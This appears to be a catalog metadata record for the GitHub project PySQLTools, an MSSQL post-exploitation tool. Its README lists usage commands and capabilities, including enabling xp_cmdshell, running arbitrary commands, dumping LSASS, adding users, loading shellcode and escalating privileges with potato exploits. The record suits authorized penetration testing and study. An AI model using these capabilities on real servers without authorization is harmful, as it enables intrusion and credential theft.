{"id":13845186,"url":"https://github.com/Ridter/PySQLTools","last_synced_at":"2025-07-12T01:31:57.138Z","repository":{"id":63554028,"uuid":"568624544","full_name":"Ridter/PySQLTools","owner":"Ridter","description":"Mssql exploitation tool","archived":false,"fork":false,"pushed_at":"2023-08-07T05:03:37.000Z","size":405,"stargazers_count":267,"open_issues_count":0,"forks_count":33,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-05-20T14:06:28.812Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ridter.png","metadata":{"files":{"readme":"README.MD","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-11-21T03:44:33.000Z","updated_at":"2025-05-15T10:46:54.000Z","dependencies_parsed_at":"2024-02-21T10:19:30.834Z","dependency_job_id":"d55f86a7-4436-401a-bd3d-47738a9d2066","html_url":"https://github.com/Ridter/PySQLTools","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Ridter/PySQLTools","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ridter","download_url":"https://codeload.github.com/Ridter/PySQLTools/tar.gz/refs/heads/main","sbom_url":"https://r
epos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ridter%2FPySQLTools/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264923076,"owners_count":23683716,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:03:15.536Z","updated_at":"2025-07-12T01:31:56.724Z","avatar_url":"https://github.com/Ridter.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"# PySQLTools\n\nA Python version of [SharpSQLTools](https://github.com/uknowsec/SharpSQLTools), convenient for use when no Windows machine is available or when working through a proxy.\n\n\u003eThe Link-related operations have not been tested. If you run into problems, feel free to open an Issue.\n\n## Usage\nSupports both Windows and password authentication 😊\n\nWindows authentication:\n```\npython PySQLTools.py localhost/administrator:'password'@10.211.55.251 -windows-auth -debug\n```\n\nUsername and password authentication:\n```\npython PySQLTools.py sa:'password'@10.211.55.251\n```\n\nIf you encounter the following error:\n```\n[-] [('SSL routines', '', 'unsafe legacy renegotiation disabled')]\n```\n\nyou can supply an OpenSSL configuration file to load, for example:\n```\nOPENSSL_CONF=openssl.conf python PySQLTools.py sa:'password'@10.211.55.251\n```\n\nThe supported commands are:\n\n```\nenable_xp_cmdshell            - you know what it means\ndisable_xp_cmdshell           - you know what it means\nxp_cmdshell {cmd}             - executes cmd using xp_cmdshell\nsp_oacreate {cmd}             - executes cmd using sp_oacreate\nxp_dirtree {path}             - executes xp_dirtree on the path\nsp_start_job {cmd}            - executes cmd using the sql server agent (blind)\nenable_ole                    - you know what it means\ndisable_ole                   - you know what it means\nupload {local} {remote}       - upload a local 
file to a remote path (OLE required)\ndownload {remote} {local}     - download a remote file to a local path (OLE required)\nenable_clr                    - you know what it means\ndisable_clr                   - you know what it means\ninstall_clr                   - create assembly and procedure\nuninstall_clr                 - drop clr\nclr_pwd                       - print current directory by clr\nclr_ls {directory}            - list files by clr\nclr_cd {directory}            - change directory by clr\nclr_ps                        - list process by clr\nclr_netstat                   - netstat by clr\nclr_ping {host}               - ping by clr\nclr_cat {file}                - view file contents by clr\nclr_rm {file}                 - delete file by clr\nclr_exec {cmd}                - for example: clr_exec whoami;clr_exec -p c:.exe;clr_exec -p c:\\cmd.exe -a /c whoami\nclr_efspotato {cmd}           - exec by EfsPotato like clr_exec\nclr_badpotato {cmd}           - exec by BadPotato like clr_exec\nclr_godpotato {cmd}           - exec by GodPotato like clr_exec\nclr_combine {remotefile}      - When the upload module cannot call CMD to perform copy to merge files\nclr_dumplsass {path}          - dumplsass by clr\nclr_rdp                       - check RDP port and Enable RDP\nclr_getav                     - get anti-virus software on this machin by clr\nclr_adduser {user} {pass}     - add user by clr\nclr_download {url} {path}     - download file from url by clr\nclr_scloader {shellcode}      - shellcode.bin\nclr_assembly {prog} {args}    - execute-assembly.\nclr_assembly_sc {shellcode}   - assembly shellcode created by donut.\nuse_link {link}               - linked server to use (set use_link localhost to go back to local or use_link .. 
to get back one step)\nenum_db                       - enum databases\nenum_links                    - enum linked servers\nenum_impersonate              - check logins that can be impersonate\nenum_logins                   - enum login users\nenum_users                    - enum current db users\nenum_owner                    - enum db owner\nexec_as_user {user}           - impersonate with execute as user\nexec_as_login {login}         - impersonate with execute as login\n! {cmd}                       - executes a local shell cmd\nshow_query                    - show query\nmask_query                    - mask query\n```\n\n## Updates\n2023/07/27\n\nAdded the ability to execute assemblies, implemented by loading shellcode; it runs perfectly on Linux:\n\n![](assets/20230727172738.png)\n\nOn other platforms, you need to generate the shellcode with the Docker version of [donut](https://github.com/TheWover/donut), and then load and execute it with `clr_assembly_sc`.\n\n## CLR\nCLR source code: [MSSQL_CLR](https://github.com/Ridter/MSSQL_CLR)\n## References:\n\n```\n1、https://github.com/uknowsec/SharpSQLTools\n2、https://github.com/ShutdownRepo/impacket/blob/getST/examples/mssqlclient.py\n```","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRidter%2FPySQLTools","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FRidter%2FPySQLTools","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FRidter%2FPySQLTools/lists"}